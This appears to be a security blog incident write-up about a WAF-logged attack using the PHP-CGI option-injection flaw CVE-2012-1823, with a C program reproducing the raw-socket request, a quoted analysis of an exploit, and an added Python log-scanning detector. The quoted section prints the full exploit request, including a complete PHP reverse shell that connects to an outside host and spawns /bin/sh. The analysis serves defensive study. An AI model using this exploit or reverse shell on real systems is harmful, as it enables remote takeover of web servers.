While reviewing attack logs for our group's web servers, the following attack record was found on the protecting WAF:
Attack source: 192.187.125.130
Request method: POST
Decoded, it reads:
The WAF in use cannot log the body of POST submissions, so the data the attacker submitted could not be determined.
Attack technique analysis
At first it was hard to understand how this HTTP request could have been sent at all: it used neither the correct domain name nor a server IP in the HTTP request! After discussion, a colleague suggested that a tool specifying the IP and port had sent it automatically over a socket.
Reproducing the attack
We tried the following:
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
    int sockfd;
    int len;
    struct sockaddr_in address;
    int result;
    /* Raw HTTP request; the query string is the percent-encoded option string captured by the WAF.
       No real domain is used: the Host header is a dummy value. */
    char *strings = "GET /test.jsp?test=%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\r\nHost: -test\r\nConnection: Close\r\n\r\n";
    char ch;

    /* Connect directly to the IP and port; no DNS resolution is involved. */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = inet_addr("159.226.16.74");
    address.sin_port = htons(80);
    len = sizeof(address);
    result = connect(sockfd, (struct sockaddr *)&address, len);
    if (result == -1) {
        perror("oops: client1");
        return 1;
    }
    write(sockfd, strings, strlen(strings));
    /* Echo the response byte by byte; stop on EOF or error. */
    while (read(sockfd, &ch, 1) > 0) {
        printf("%c", ch);
    }
    close(sockfd);
    return 0;
}
Compiling and running it returns the following:
HTTP/1.1 403 Forbidden
Date: Mon, 16 Jun 2014 02:11:20 GMT
Content-Type: text/html
Content-Length: 343
X-Squid-Error: policy/scan.html 0
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>访问禁止</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
</head>
<body>
请不要进行扫描攻击!
</body>
</html>
<BR clear="all">
<ADDRESS>
</ADDRESS>
</BODY></HTML>
Checking the WAF attack log:
The effect is the same as the attacker's, which confirms the guess: the attacker did indeed send the HTTP request over a socket with the IP and port specified.
Against sites that only accept requests for their own domain name, this attack method should be ineffective. Nevertheless, it is very effective against ordinary sites that allow direct access by IP address. Imagine the destination IP in the sample program being an IP range: every vulnerable web server in that range would be hit, and the attacker would not need to know any site's domain name at all.
Vulnerability analysis
Searching Baidu or Google for:
-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
turned up the following information [2]:
Apache / PHP 5.x Remote Code Execution: a brief analysis
I finished writing this in the afternoon and sent it to the mailing list, then a classmate came by and I went out. When I came back I saw on Weibo that 素包子 had written an article, clearly reasoned and nicely structured. Below is my own rough write-up.
Test environment
ubuntu 10.04 + apache2 + php 5.3.2. At first I tested with apache2 installed directly via apt-get install, but no matter how I configured it, it would not work; I later switched to building from source, and after some configuration the exp from exploit-db worked.
Requirements for using this exp (from the exp description)
1. The target is affected by cve-2012-1823 [http://zone.wooyun.org/content/151]; the reason is explained below
2. PHP is installed as CGI
3. CGI programs such as /cgi-bin/php5-cgi are reachable by path
exp analysis
The exp works roughly as follows:
By default, php.ini has two switches related to the CGI execution mode. The exp uses cve-2012-1823 to turn off the CGI security-related switches, then turns on remote include, includes the POSTed data and executes it; that POSTed data is the reverse shell payload. The exp also tries several CGI programs: /cgi-bin/php, /cgi-bin/php5, /cgi-bin/php-cgi, /cgi-bin/php.cgi
The exp's packet is as follows:
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 10.21.24.111
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded
Content-Length: 2048
Connection: close
<?php
set_time_limit(0);
$ip = '10.21.24.109';
$port = 7758;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
exit(1);
?>
Clearly this is an exp built for one specific vulnerability, and it has two key parts:
one is the attack URL captured by our protecting WAF, namely the URL of the POST above;
the other is the POST body, which is not reproduced here (see [2] for details): the POSTed data is a PHP reverse shell payload.
Summary
Issuing HTTP requests over raw sockets makes it possible, without caring about domain names, to scan, probe or attack IP addresses in bulk for a specific vulnerability.
References
1. http://blog.163.com/zongyuan1987@126/blog/static/13162315620108104825970/
2. http://www.2cto.com/Article/201311/256690.html
3. http://blog.youkuaiyun.com/mqwind/article/details/4814842
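As an added defensive example (not code from the original post or from the exp it quotes), the following Python script applies the two observations above to web server log lines: it URL-decodes the query the same way the WAF did, flags the argv-shaped php-cgi option injection and the php.ini overrides present in the decoded query, and flags requests whose Host header is not one of the server's own names (the direct-IP socket pattern reproduced earlier). The log line format, the allowed host list and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# php.ini overrides that the decoded attack query on this page sets with "-d".
OVERRIDES = ("auto_prepend_file=php://input", "allow_url_include=on", "safe_mode=off",
             "disable_functions=", "open_basedir=none", "cgi.force_redirect=0")

# Names this server legitimately answers to (assumed placeholder list).
ALLOWED_HOSTS = {"www.example.org"}

# Constructed sample log lines (assumed format): client "request-line" status "Host header".
LOG_LINES = [
    '203.0.113.7 "POST /cgi-bin/php?%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65'
    '%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 403 "-test"',
    '198.51.100.4 "GET /test.jsp?test=%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65'
    '%3D%6F%6E HTTP/1.1" 200 "192.0.2.10"',
    '192.0.2.20 "GET /index.php?page=about HTTP/1.1" 200 "www.example.org"',
]

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) HTTP/[\d.]+" (\d{3}) "([^"]*)"$')

def analyze(line):
    """Parse one log line; return a dict with a (possibly empty) list of reasons, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, method, target, _status, host = m.groups()
    path, _, raw_query = target.partition("?")
    query = unquote_plus(raw_query)  # the same decoding step the WAF applied
    reasons = []
    # A query with no literal "=" is handed to the CGI binary as argv (RFC 3875);
    # encoding "=" as %3D keeps it argv-shaped while still carrying "-d key=value".
    if "=" not in raw_query and query.lstrip().startswith("-"):
        reasons.append("argv-shaped query beginning with a php-cgi switch (CVE-2012-1823 pattern)")
    hits = [o for o in OVERRIDES if o in query.lower()]
    if hits:
        reasons.append("php.ini override in query: " + ", ".join(hits))
    if host not in ALLOWED_HOSTS:
        reasons.append(f"Host {host!r} is not a served name (direct-IP/socket request)")
    return {"src": src, "method": method, "path": path, "host": host,
            "decoded_query": query, "reasons": reasons}

def scan(lines):
    return [r for r in map(analyze, lines) if r and r["reasons"]]

if __name__ == "__main__":
    for r in scan(LOG_LINES):
        print(r["src"], r["method"], r["path"], "->", "; ".join(r["reasons"]))
```

The Host check is the cheap mitigation the text describes: a virtual host that only answers to its configured names turns the whole socket-to-IP-range technique into a stream of rejected requests that are also easy to alert on.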